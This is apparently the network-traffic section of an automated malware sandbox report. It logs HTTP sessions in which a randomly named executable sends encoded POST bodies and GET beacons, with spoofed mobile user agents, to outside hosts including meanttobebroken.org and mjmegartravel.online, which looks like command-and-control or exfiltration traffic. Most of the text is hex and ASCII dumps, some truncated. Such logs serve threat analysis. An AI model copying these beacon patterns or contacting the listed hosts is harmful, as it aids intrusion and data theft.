                                                                                  Nov 15, 2024 06:46:52.473267078 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Fri, 15 Nov 2024 05:46:52 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Vary: Accept-Encoding
                                                                                  x-powered-by: WP Engine
                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                  Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e2cf17cf9252cd4-DFW
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Data Raw: 31 36 65 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 [TRUNCATED]
                                                                                  Data Ascii: 16eb<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G$#dI9phL"O6AN0a}3xQr{r(5rd8C"0TgBKm9/1vAG%)=E%M;0jy&?#Fc,Isl!"8cbR[?c1jN9Bb.OLN&',It"/iFEH.Fh>%x;8#a~YM;'X!L+N(<)'oNu=98XL(|Lz7Q(,d2qeLXj8<yM_io\b\.!qc";7lb,6U:GO
                                                                                  Nov 15, 2024 06:46:52.473284006 CET1236INData Raw: df 9d 98 bd be 5b 9a 5b db 1e c6 e6 7d 1e 6f 1b 9f b5 c1 3e e1 6c c0 a4 38 59 8e f3 49 ce 68 1e 93 7b 0b 0d 59 9a b2 c9 09 72 15 0a 10 bd 1c 51 81 c0 f1 11 15 88 15 92 66 f4 1f 24 46 13 2a 47 48 8e 08 fa 77 86 85 44 9f df 7f 42 45 3a 4e 68 8e ee
                                                                                  Data Ascii: [[}o>l8YIh{YrQf$F*GHwDBE:Nh#-5eq U%)'L!1G$VO44XM&S(U`[]]+!$JghD2l'#bf8K42~3a
                                                                                  Nov 15, 2024 06:46:52.473294020 CET1236INData Raw: 9e 91 0c b3 27 d5 9e 87 58 d2 89 c9 90 f0 f0 c8 b3 a8 03 27 39 0e 2e 0a 92 c7 ef 46 34 8d 1b d2 9c d7 99 f9 37 ce 32 2a c8 f1 71 83 85 c6 a4 78 5f 9d d4 3e eb 5c 2b 0c 4b 84 5f 75 44 5a a5 57 7c b3 72 a7 4c c5 22 9c a9 98 97 23 9a 27 dd 23 cf 5a
                                                                                  Data Ascii: 'X'9.F472*qx_>\+K_uDZW|rL"#'#Z=H!N1-_qqP!ah?}Na8&akaej k56fd13fHNJ~~ukyCNuR3RmLN8NyC{3ykmJ=
                                                                                  Nov 15, 2024 06:46:52.473345041 CET1236INData Raw: 5b b2 f7 ac c0 3b b3 fc a6 f7 28 f7 1a 97 00 09 b6 b8 d7 2e 33 04 ed c0 f2 cf da 96 b7 32 03 34 b6 2d df 2b 1b bf 4b 14 cd 72 65 0d 15 12 bb f9 57 58 95 76 08 bc 53 ab d5 b1 5a 9d c7 98 c3 32 6b 39 14 78 0a 6c 1f 26 81 1d 83 10 34 cf ac f2 ff 95
                                                                                  Data Ascii: [;(.324-+KreWXvSZ2k9xl&4t-eGsyftN-+h`+>[~CnjZji,k[g&:[uf>jA:~XAS>C+hyqS<?e^;S[Vm&j/{gu}4=TlZT<?
                                                                                  Nov 15, 2024 06:46:52.473357916 CET848INData Raw: 9d 79 6b 83 79 09 b4 c9 7f 55 99 b6 28 1e c3 05 d5 e5 58 ee 3e 65 65 93 c2 86 52 51 55 50 56 21 f6 3e a6 f2 cb ef 1f ea 8b dc e2 b5 22 b7 df 3f ff b4 0f a3 fb 2c e5 45 e4 14 a3 e2 0d 17 b1 ae 5f 73 f5 a7 1d 0e 0f fb ea e2 a7 ac 56 25 9c 33 de f2
                                                                                  Data Ascii: ykyU(X>eeRQUPV!>"?,E_sV%3ZhnP6h3mSE}:8#aYr;5hPbhxVJxGiwD0FZpW2)(FtaUQv+kP(rS0x4Jwc1.4Kq-
                                                                                  Nov 15, 2024 06:46:52.473510981 CET604INData Raw: 46 28 44 8b 1a 96 ca 57 60 de 4e 3f c4 0d b4 45 62 b3 77 78 b0 ac 85 64 b9 96 e7 dd 08 8e 6f 34 fd 03 3a 44 8d 25 07 47 8b 28 be ae 5a b4 90 24 fe 00 9f 4b 41 df 74 69 1e 3a 0a 43 74 72 82 34 89 83 a5 54 cb dc 03 b3 12 0a 55 42 5a d1 54 4f b5 f4
                                                                                  Data Ascii: F(DW`N?Ebwxdo4:D%G(Z$KAti:Ctr4TUBZTOvde"+IH{s^gOfQered5-SryL8`-FlcfQWr`/~}=8E5/f5:`l_AU"7Yh#2`V-W"OT+q=Hq~ka-


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.2.2249181141.193.213.1180172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:46:54.369551897 CET2472OUTPOST /zdt7/ HTTP/1.1
                                                                                  Host: www.meanttobebroken.org
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.meanttobebroken.org
                                                                                  Referer: http://www.meanttobebroken.org/zdt7/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 3624
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 35 52 48 3d 44 66 61 7a 76 70 70 51 61 4c 44 51 44 74 79 57 72 30 6e 74 4a 49 71 47 37 79 45 51 68 42 54 30 79 73 6b 44 47 79 69 32 71 2f 31 74 45 71 62 48 46 52 6b 55 61 41 6b 33 67 6a 4a 58 4a 56 39 71 59 74 63 47 65 55 4a 5a 37 76 4e 41 68 2f 76 69 5a 77 76 50 6d 69 70 37 55 56 74 47 72 41 31 68 6f 64 51 43 6e 49 51 77 59 36 52 63 36 4d 43 64 41 49 45 38 65 2f 32 38 6a 73 59 2f 47 6b 79 76 6f 4a 4c 6c 6e 61 72 62 4d 6c 38 71 34 52 74 6d 54 68 58 52 43 46 55 2f 44 39 2b 63 6e 50 52 73 51 53 58 4c 36 42 64 42 69 4a 62 77 6d 4b 51 49 48 31 56 54 44 59 43 35 57 6b 70 6c 37 57 32 65 4e 67 6f 47 33 44 4a 54 45 68 4c 33 6b 47 55 32 78 45 74 48 35 75 75 57 78 71 39 2b 34 65 73 58 48 62 36 32 41 4f 6a 47 2f 47 47 56 6f 39 52 58 68 74 78 76 37 50 42 59 31 4b 69 35 58 32 56 63 63 64 73 31 6d 63 63 47 75 51 4e 71 75 6e 43 75 6e 31 78 6b 79 7a 32 32 34 79 4c 79 69 68 6b 47 4b 37 34 6f 30 49 55 33 69 66 45 65 43 45 53 5a 45 53 70 66 49 53 62 6c 7a 76 44 57 6b 6f 4d 76 71 63 61 52 4a 75 59 42 4b 45 70 4a 62 4b [TRUNCATED]
                                                                                  Data Ascii: 5RH=DfazvppQaLDQDtyWr0ntJIqG7yEQhBT0yskDGyi2q/1tEqbHFRkUaAk3gjJXJV9qYtcGeUJZ7vNAh/viZwvPmip7UVtGrA1hodQCnIQwY6Rc6MCdAIE8e/28jsY/GkyvoJLlnarbMl8q4RtmThXRCFU/D9+cnPRsQSXL6BdBiJbwmKQIH1VTDYC5Wkpl7W2eNgoG3DJTEhL3kGU2xEtH5uuWxq9+4esXHb62AOjG/GGVo9RXhtxv7PBY1Ki5X2Vccds1mccGuQNqunCun1xkyz224yLyihkGK74o0IU3ifEeCESZESpfISblzvDWkoMvqcaRJuYBKEpJbKoSvymyOngpdVvs1jzyGWmAeZh8pBx6Ey1IbGNghbYtnkZlD76b6cUgHXCLBo5IDTZFFGABdjQUyeGQfLe3UiSJ7J45LPM5txYoJNnt4krWQ9I9svWIv9DWnVGKjnMlQlZMqwbZApio7Boxw2FB8xJ87BM4QGr8xVmYhsYuydCl0OlSUlIzW2Pw235KLVOkJZGLGgYlhSoBHNm+ft2uXyVcRIfZMyY/rjs0kxdzaqQg9N5jrlJePpP5fzeYMmGkEMNtntJ24xaOZ/EEK4uzEv1fjRupULmnEEkXhFaNIvvCYjG66FK6jd9HMp1oDEJC4GOZVGy52jFhY7IF0hqjmmO/z0zs0VxgcPOMoG3Mn5KARW4+iI4LLwLVv5AY6t1NZxeZmiI0IPMXE2YZp7plZsaYztkwwQSUQstmFGCrTRPPzeRztauVUKF+dAuS8XmyQ6fpO2lzLsyoorDIhj/qCrHLZQ53i+ErCfWsWLUVngZLWrsf6AFbUBbbYR9w5r/xYSmU3FXlCUFzwOU1ZSm0BYllPMyt+en4Adb0rEGBiWOPw4nBAy4gU4Ur6iMbUMB1ZS4Gm9laGJ7rIqsANdMR8Ih8omz3xcwJo6j66DiKD0sUyRoH+qXXNeco1ILITT1n8j5sZB03PNwI/2MZMMg58556YyBrYUTmNKvU [TRUNCATED]
                                                                                  Nov 15, 2024 06:46:54.374877930 CET1643OUTData Raw: 69 6d 2f 66 61 6e 43 61 4f 37 75 70 30 4d 64 32 6c 48 79 78 31 36 66 68 2b 78 30 36 71 53 45 42 42 58 52 56 61 44 4f 30 31 33 41 44 37 75 61 4b 38 44 64 4f 71 5a 79 6c 54 78 4b 54 70 69 51 78 47 6f 51 36 47 57 6c 72 57 73 62 65 62 4d 4a 59 59 41
                                                                                  Data Ascii: im/fanCaO7up0Md2lHyx16fh+x06qSEBBXRVaDO013AD7uaK8DdOqZylTxKTpiQxGoQ6GWlrWsbebMJYYA489OszkIvB16U70ujnRrn5YkpxMv5Xan/EKkdc0BiVjR959yhp2I4pMNeBOPlTAZnZJZ50XGh/jS0BU/4v4HrFKDXpibqgNtRt6Zw16Yi3wKPQ4pe30eTHJhRzL7TnRAVKsB+DvCrYLk4uBLsQqsK/XPZZ9qh4yoN
                                                                                  Nov 15, 2024 06:46:55.057588100 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Fri, 15 Nov 2024 05:46:54 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Vary: Accept-Encoding
                                                                                  x-powered-by: WP Engine
                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                  Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e2cf18d1b14e5b1-DFW
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Data Raw: 31 36 65 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 [TRUNCATED]
                                                                                  Data Ascii: 16eb<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G$#dI9phL"O6AN0a}3xQr{r(5rd8C"0TgBKm9/1vAG%)=E%M;0jy&?#Fc,Isl!"8cbR[?c1jN9Bb.OLN&',It"/iFEH.Fh>%x;8#a~YM;'X!L+N(<)'oNu=98XL(|Lz7Q(,d2qeLXj8<yM_io\b\.!qc";7lb,6U:GO
                                                                                  Nov 15, 2024 06:46:55.057598114 CET212INData Raw: df 9d 98 bd be 5b 9a 5b db 1e c6 e6 7d 1e 6f 1b 9f b5 c1 3e e1 6c c0 a4 38 59 8e f3 49 ce 68 1e 93 7b 0b 0d 59 9a b2 c9 09 72 15 0a 10 bd 1c 51 81 c0 f1 11 15 88 15 92 66 f4 1f 24 46 13 2a 47 48 8e 08 fa 77 86 85 44 9f df 7f 42 45 3a 4e 68 8e ee
                                                                                  Data Ascii: [[}o>l8YIh{YrQf$F*GHwDBE:Nh#-5eq U%)'L!1G$VO44XM&S(U`[]]+!$JghD2l'
                                                                                  Nov 15, 2024 06:46:55.057615042 CET1236INData Raw: 1c 17 23 e3 62 66 fc a0 38 dc 4b a3 bb 9c ab 34 08 e4 16 c3 32 7e d0 90 dd af 33 e3 07 e0 61 74 8d bf 93 c1 67 2a 09 74 d2 b8 82 57 97 9c 5e 4d c8 40 68 e0 31 4f 1f 01 36 2c 43 69 dd ad d3 d6 32 62 a2 75 a5 2c 37 ba 86 61 19 05 03 db 50 9c fe 18
                                                                                  Data Ascii: #bf8K42~3atg*tW^M@h1O6,Ci2bu,7aPyB]%h.l$+R,#2L(ZHNdn-1ScI!1f4'Vu>Gj8saF'z8UAEaraMg,?v
                                                                                  Nov 15, 2024 06:46:55.057621002 CET1236INData Raw: 97 be 52 6d ad 4c 4e 8b 9c 38 4e d3 79 43 09 7b 94 9b 33 90 79 6b 14 1d 1f d7 f5 6d 04 4a 3d d0 97 df 7f 39 3e fe f2 fb 2f a5 f7 7d 52 b2 ab c6 3a e8 b7 29 1b 98 2b 73 1b 05 13 f2 23 11 02 27 a4 61 bc 1e 3a 92 7d 56 53 6e c3 7c 6d 34 8c d7 5f 37
                                                                                  Data Ascii: RmLN8NyC{3ykmJ=9>/}R:)+s#'a:}VSn|m4_7faaZUT972i+w5D{psoh5D`n_q;,NaFrr3cK6 +CVasbxC>9"*o!*1.m=>^t8
                                                                                  Nov 15, 2024 06:46:55.057630062 CET1236INData Raw: 6d b5 da 26 6a 2f 98 7b a7 96 67 75 82 bd 7d 34 1e 8b db 3d 54 6c 5a be 1f ac 54 3c 3f 87 a4 e0 9f 07 2b ce 9d b6 75 76 06 d1 fa 18 6b 95 2b 59 44 1e c9 06 8a 6f 4b f1 5e f1 3d 0b 54 7a 0a fc 0a 63 18 ef ce a9 e5 9f 3d 1a 98 24 05 7f a4 11 34 09
                                                                                  Data Ascii: m&j/{gu}4=TlZT<?+uvk+YDoK^=Tzc=$4(JM5~e4|i~|c-\pv,/vApE.X+x&<"i84HtH"GE94vy]vNZwv:G*
                                                                                  Nov 15, 2024 06:46:55.057636976 CET1236INData Raw: 0f bb af af 53 96 30 a1 a0 0e fa 78 8f 81 34 4a 77 63 19 31 2e fa 34 4b f6 71 fe 2d b1 ad eb 05 dd 4c 0e 06 36 c8 61 db 53 02 b5 e3 aa d4 10 e1 74 59 fd 7c c9 d0 db 55 f5 f3 36 35 6c 1b a8 82 ed b1 d6 47 14 38 df ae b4 1d c3 52 1b 4c d4 77 01 b2
                                                                                  Data Ascii: S0x4Jwc1.4Kq-L6aStY|U65lG8RLw648 %$IYVDK}h1Sj|4nit[~A6iJK'*"k~+%f(P?88}wk.kZ9.bK/(.>H2v+PJoU>
                                                                                  Nov 15, 2024 06:46:55.057641029 CET4INData Raw: 0d 0a 0d 0a
                                                                                  Data Ascii:


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.2.2249182141.193.213.1180172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:46:56.908761978 CET422OUTGET /zdt7/?5RH=OdyTsfpKOp+FbfSCrWaWA4zl2ndKvmvs0o0DPQC5l8EmE472eTQ0Sykym0VZOF0oXIsjWHJk3q5TqJLqfgnsjz8wdkFbxgxZ0u4ZxfA0ZKI/ytukIpl2H+uK2LJW&WrGp=yRUDttthc40H6jfP HTTP/1.1
                                                                                  Host: www.meanttobebroken.org
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Nov 15, 2024 06:46:57.606282949 CET659INHTTP/1.1 301 Moved Permanently
                                                                                  Date: Fri, 15 Nov 2024 05:46:57 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  x-powered-by: WP Engine
                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  X-Redirect-By: WordPress
                                                                                  Location: http://meanttobebroken.org/zdt7/?5RH=OdyTsfpKOp+FbfSCrWaWA4zl2ndKvmvs0o0DPQC5l8EmE472eTQ0Sykym0VZOF0oXIsjWHJk3q5TqJLqfgnsjz8wdkFbxgxZ0u4ZxfA0ZKI/ytukIpl2H+uK2LJW&WrGp=yRUDttthc40H6jfP
                                                                                  X-Cacheable: non200
                                                                                  Cache-Control: max-age=600, must-revalidate
                                                                                  X-Cache: MISS
                                                                                  X-Cache-Group: iphone
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e2cf19d0b4e6b31-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.2.224918313.248.213.4580172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:47:02.685404062 CET2472OUTPOST /t2sm/ HTTP/1.1
                                                                                  Host: www.mjmegartravel.online
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.mjmegartravel.online
                                                                                  Referer: http://www.mjmegartravel.online/t2sm/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 2160
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 35 52 48 3d 77 36 67 2b 58 65 6a 6f 42 31 59 79 42 70 75 56 65 4b 57 33 7a 32 67 69 6c 75 76 6a 74 45 76 65 45 78 58 30 67 55 4f 30 46 68 65 38 46 33 75 4f 71 56 43 4b 70 32 5a 67 4e 56 6f 32 56 72 6d 45 32 78 30 32 58 38 34 41 53 64 7a 30 59 49 79 68 51 56 6f 69 4d 66 38 4c 48 54 4e 34 72 35 44 65 7a 38 54 62 72 44 4c 30 30 31 43 34 7a 33 6a 57 47 42 51 4a 7a 78 62 57 62 2f 56 75 31 68 78 61 73 38 72 35 36 35 5a 54 46 72 44 70 78 6f 2f 30 4b 73 50 43 55 6c 62 6f 39 6c 64 6c 39 76 7a 74 77 59 46 50 71 30 51 79 6d 4f 6f 72 32 44 42 78 32 44 35 46 35 42 65 51 4b 75 56 70 51 58 5a 6e 73 6a 50 4b 49 51 33 74 2f 57 51 62 63 46 4c 73 4f 6c 78 63 77 34 49 65 36 6e 44 6c 75 66 4e 58 66 78 55 75 59 63 6f 56 36 78 39 32 2f 55 68 4b 64 37 63 6c 77 48 45 4c 59 74 36 2f 2f 51 36 38 74 72 49 6d 78 6d 63 6e 4f 57 53 4f 42 50 78 61 4e 73 68 4f 36 4b 37 48 76 2f 47 73 51 53 38 5a 50 63 31 61 71 79 63 4d 73 4e 51 4e 7a 5a 76 33 5a 54 58 4b 63 6d 32 66 52 69 68 45 30 54 50 37 6e 4f 41 67 65 44 34 6b 2b 71 2b 37 54 48 [TRUNCATED]
                                                                                  Data Ascii: 5RH=w6g+XejoB1YyBpuVeKW3z2giluvjtEveExX0gUO0Fhe8F3uOqVCKp2ZgNVo2VrmE2x02X84ASdz0YIyhQVoiMf8LHTN4r5Dez8TbrDL001C4z3jWGBQJzxbWb/Vu1hxas8r565ZTFrDpxo/0KsPCUlbo9ldl9vztwYFPq0QymOor2DBx2D5F5BeQKuVpQXZnsjPKIQ3t/WQbcFLsOlxcw4Ie6nDlufNXfxUuYcoV6x92/UhKd7clwHELYt6//Q68trImxmcnOWSOBPxaNshO6K7Hv/GsQS8ZPc1aqycMsNQNzZv3ZTXKcm2fRihE0TP7nOAgeD4k+q+7THQNmqETLE3c2JNZ1ZAN+7MRLoVykwVFYXI7J44ywQvVYymziNF7rAZnXBpOoDuSCriy/W4YO1yChy8kLhUWL5/+o7ed53iMpGjNxtuFHezTPJKPSFL1kaZj0PCDIuyWmJA40EkyRVGY7+BRq92YrQspsnLq1R4bz3IPmM37FBR4NZSpp90k6rhF3gJx7ZqCoN9ahjoQfZ9do0mboDXD5yK8BFYCvEC8j88IcrjO1UFU5V+Xa6qJF5xSxouTAGKZi3m1zIHfeAWX24eLnvPRZjRI/s332KhOwI+JxmpqFYtSd5776ActnjzDRqxE7Jr/S8C1SL6KQ23E9OxJMFvGbwipmO4P3vfEPYNHdCUSO9+y6NiFXb80b7Vg0Z1XlLCdXNVNhNcdvIbDM48i0K4KE24CLCmTIgEAjiF77wVAqR8t+iSjkDQQxI7CXAmacyaB0voPyhCE3LIsqeESALndPecnbGKLtfOt8X3FmKkwEMsXH0D06ivDLVZPUFEE27nRGKDDkVNKJD2cbPlL8TH5xFcQ0tij2IGZurJc420E5KvFmCBsR8m5N7d4HKLDKdRaLIdIvUY+m9q3tlHtJGD+NMAgox6LsGPtVmjszmVgw+5G7DNn3yq1w6+rzBlAWZVugvj4o7iiRkstNS2a0adgm+JlOf1sNG6xTbTO [TRUNCATED]
                                                                                  Nov 15, 2024 06:47:02.690434933 CET182OUTData Raw: 67 77 78 47 58 76 54 51 37 6a 36 64 6c 6c 6d 68 42 73 54 69 30 59 4c 42 5a 38 54 74 4c 4c 6a 39 4b 50 75 77 35 43 6f 52 67 34 6f 71 65 35 4f 6d 6b 46 6b 43 48 32 31 64 43 67 64 37 6a 41 39 35 6a 57 72 78 45 38 58 4b 72 74 6b 68 67 6e 4c 4a 57 51
                                                                                  Data Ascii: gwxGXvTQ7j6dllmhBsTi0YLBZ8TtLLj9KPuw5CoRg4oqe5OmkFkCH21dCgd7jA95jWrxE8XKrtkhgnLJWQY4vSqA+t6BcnbcUzvHAehbbCgVEeDJ5T0xIKqyW8VMt80F368VTWeGUZ5rfaMD7oYaZjKRV22Hj5a6ovoYXFItTehHT2xohzbM+w


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.224918413.248.213.4580172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:47:05.226866007 CET693OUTPOST /t2sm/ HTTP/1.1
                                                                                  Host: www.mjmegartravel.online
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.mjmegartravel.online
                                                                                  Referer: http://www.mjmegartravel.online/t2sm/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 200
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 35 52 48 3d 77 36 67 2b 58 65 6a 6f 42 31 59 79 42 6f 75 56 63 62 57 33 38 32 67 69 72 4f 76 6a 37 30 76 51 45 78 61 44 67 52 2b 65 46 51 57 38 46 6e 65 4f 71 6a 57 4b 71 32 5a 76 55 6c 6f 79 62 4c 6d 56 32 78 30 4d 58 35 41 41 53 64 58 30 59 72 61 68 5a 30 6f 74 52 66 38 7a 47 6a 4e 37 72 35 50 39 7a 39 76 4c 72 41 4c 30 30 32 57 34 30 33 54 57 4e 44 49 4a 6d 52 62 4d 5a 2f 56 44 31 68 38 59 73 38 37 68 36 35 4e 54 46 66 6a 70 78 36 33 30 64 76 6e 43 42 31 62 6c 77 46 63 5a 79 39 7a 6f 34 5a 46 53 33 56 38 4c 67 4f 63 56 36 68 46 32 2b 77 74 69 77 68 79 6e 45 4c 45 61 47 30 63 64 2b 51 3d 3d
                                                                                  Data Ascii: 5RH=w6g+XejoB1YyBouVcbW382girOvj70vQExaDgR+eFQW8FneOqjWKq2ZvUloybLmV2x0MX5AASdX0YrahZ0otRf8zGjN7r5P9z9vLrAL002W403TWNDIJmRbMZ/VD1h8Ys87h65NTFfjpx630dvnCB1blwFcZy9zo4ZFS3V8LgOcV6hF2+wtiwhynELEaG0cd+Q==


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  24192.168.2.224918513.248.213.4580
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:47:07.923243046 CET2472OUTPOST /t2sm/ HTTP/1.1
                                                                                  Host: www.mjmegartravel.online
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.mjmegartravel.online
                                                                                  Referer: http://www.mjmegartravel.online/t2sm/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 3624
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
